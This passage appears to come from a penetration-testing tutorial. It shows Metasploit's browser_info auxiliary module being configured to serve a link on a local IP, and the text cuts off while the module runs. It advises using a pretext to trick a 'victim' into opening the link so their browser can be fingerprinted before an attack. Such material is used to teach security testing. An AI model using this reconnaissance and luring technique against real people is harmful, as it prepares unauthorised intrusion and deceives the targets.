As always, good reconnaissance makes all the difference, so we first need to gather information about the browser the victim is using.
- To help us with this task, we can use the HTTP Client Information Gather auxiliary module by specifying the IP address and port of the host to listen on and the URI to use, then use one of your favorite pretexts to make the victim open the link:
msf > use auxiliary/gather/browser_infomsf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5msf auxiliary(gather/browser_info) > set SRVPORT 80SRVPORT => 80msf auxiliary(gather/browser_info) > set URIPATH /URIPATH => /msf auxiliary(gather/browser_info) > run[*] Auxiliary module running as background job 1.msf auxiliary(gather/browser_info) ...